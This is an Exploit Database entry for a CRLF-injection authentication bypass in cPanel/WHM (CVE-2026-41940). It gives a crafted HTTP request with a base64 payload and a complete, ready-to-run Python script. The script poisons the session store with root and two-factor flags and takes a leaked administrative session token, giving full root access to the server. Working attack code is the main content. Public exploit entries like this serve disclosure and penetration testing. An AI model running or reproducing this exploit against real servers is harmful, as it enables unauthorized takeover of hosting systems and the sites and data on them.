This website uses cookies We use cookies to personalise content and ads, to provide social media features and to analyse our traffic. We also share information about your use of our site with our social media, advertising and analytics partners who may combine it with other information that you’ve provided to them or that they’ve collected from your use of their services. You consent to our cookies if you continue to use our website. Show details Allow all cookies Use necessary cookies only EXPLOIT DATABASE EXPLOITS GHDB PAPERS SHELLCODES SEARCH EDB SEARCHSPLOIT MANUAL SUBMISSIONS ONLINE TRAINING cPanel - CRLF Injection EDB-ID: 52574 CVE: 2026-41940 EDB Verified: Author: NU11SECUR1TY Type: WEBAPPS Exploit: / Platform: PHP Date: 2026-05-26 Vulnerable App: # ExploitTitle: cPanel 11.40 - CRLF Injection # Author: nu11secur1tyAI # Date: 2026-04-30 # Vendor: cPanel, L.L.C. # Software: cPanel & WHM (cpsrvd) # Reference: CVE-2026-41940 / watchTowr-2026-01 ## Description: A critical authentication bypass vulnerability exists in the cPanel/WHM `cpsrvd` daemon due to improper neutralization of line delimiters (CRLF) in the `whostmgrsession` cookie and `Authorization` headers. An unauthenticated remote attacker can leverage this flaw to inject malicious session parameters directly into the server's flat-file session metadata store. By injecting sequences such as `user=root`, `hasroot=1`, and `tfa_verified=1`, the attacker subverts the internal authentication logic, forcing the system to issue a valid administrative session token (`/cpsessXXXXXXXXXX/`). This grants the attacker full `root` privileges over the WHM interface and the host operating system without requiring valid credentials. STATUS: MEDIUM - HIGH / Vulnerability [+] Payload: ```http GET / HTTP/1.1 Host: [TARGET_HOST]:2087 Authorization: Basic cm9vdDp4DQpzdWNjZXNzZnVsX2ludGVybmFsX2F1dGhfd2l0aF90aW1lc3RhbXA9OTk5OTk5OTk5OQ0KdXNlcj1yb290DQp0ZmFfdmVyaWZpZWQ9MQ0KaGFzcm9vdD0x Cookie: whostmgrsession=[PREAUTH_SESSION_ID] Connection: close ``` [+] Exploit (Python): import argparse import re import requests import urllib.parse import urllib3 # Disable SSL warnings for cleaner output urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) # Crafted B64 payload: # root:x\r\nsuccessful_internal_auth_with_timestamp=9999999999\r\nuser=root\r\ntfa_verified=1\r\nhasroot=1 PAYLOAD_B64 = "cm9vdDp4DQpzdWNjZXNzZnVsX2ludGVybmFsX2F1dGhfd2l0aF90aW1lc3RhbXA9OTk5OTk5OTk5OQ0KdXNlcj1yb290DQp0ZmFfdmVyaWZpZWQ9MQ0KaGFzcm9vdD0x" def exploit(target): s = requests.Session() s.verify = False print(f"[*] Initializing attack on {target}...") # Stage 1: Obtain pre-auth session base try: r = s.post(f"{target}/login/?login_only=1", data={"user": "root", "pass": "wrong_pass"}, allow_redirects=False, timeout=10) cookie = r.headers.get("Set-Cookie", "") match = re.search(r"whostmgrsession=([^;,]+)", cookie) if not match: print("[-] Error: Could not retrieve whostmgrsession cookie.") return session_base = urllib.parse.unquote(match.group(1)) print(f"[+] Obtained session base: {session_base}") # Stage 2: Poison session via CRLF Injection headers = { "Authorization": f"Basic {PAYLOAD_B64}", "Cookie": f"whostmgrsession={urllib.parse.quote(session_base)}", "Connection": "close" } r = s.get(f"{target}/", headers=headers, allow_redirects=False, timeout=10) # Stage 3: Extract leaked security token location = r.headers.get("Location", "") token_match = re.search(r"/cpsess\d{10}", location) if token_match: token = token_match.group(0) print(f"[!] EXPLOIT SUCCESSFUL!") print(f"[!] Leaked Token: {token}") print(f"[!] Access URL: {target}{token}/") else: print("[-] Exploit failed. The target may be patched or protected by a WAF.") except Exception as e: print(f"[-] Connection error: {e}") if __name__ == "__main__": parser = argparse.ArgumentParser(description="cPanel/WHM CVE-2026-41940 Exploit") parser.add_argument("--target", required=True, help="Target URL (e.g., [https://192.168.1.1:2087](https://192.168.1.1:2087))") args = parser.parse_args() exploit(args.target.rstrip("/")) ``` [+]Reproduce: https://github.com/nu11secur1ty/CVE-mitre/tree/main/2026/CVE-2026-41940 Time spent: 03:45:00 -- System Administrator - Infrastructure Engineer Penetration Testing Engineer Exploit developer at https://packetstormsecurity.com/ https://cve.mitre.org/index.html https://cxsecurity.com/ and https://www.exploit-db.com/ home page: https://www.asc3t1c-nu11secur1ty.com/ hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E= nu11secur1ty https://www.asc3t1c-nu11secur1ty.com/ -- System Administrator - Infrastructure Engineer Penetration Testing Engineer Exploit developer at https://packetstorm.news/ https://cve.mitre.org/index.html https://cxsecurity.com/ and https://www.exploit-db.com/ 0day Exploit DataBase https://0day.today/ home page: https://www.asc3t1c-nu11secur1ty.com/ hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E= nu11secur1ty <http://nu11secur1ty.com/> Copy Tags: Advisory/Source: Link Databases Links Sites Solutions Exploits Search Exploit-DB OffSec Courses and Certifications Google Hacking Submit Entry Kali Linux Learn Subscriptions Papers SearchSploit Manual VulnHub OffSec Cyber Range Shellcodes Exploit Statistics Proving Grounds Penetration Testing Services EXPLOIT DATABASE BY OFFSEC TERMS PRIVACY ABOUT US FAQ COOKIES © OffSec Services Limited 2026. All rights reserved.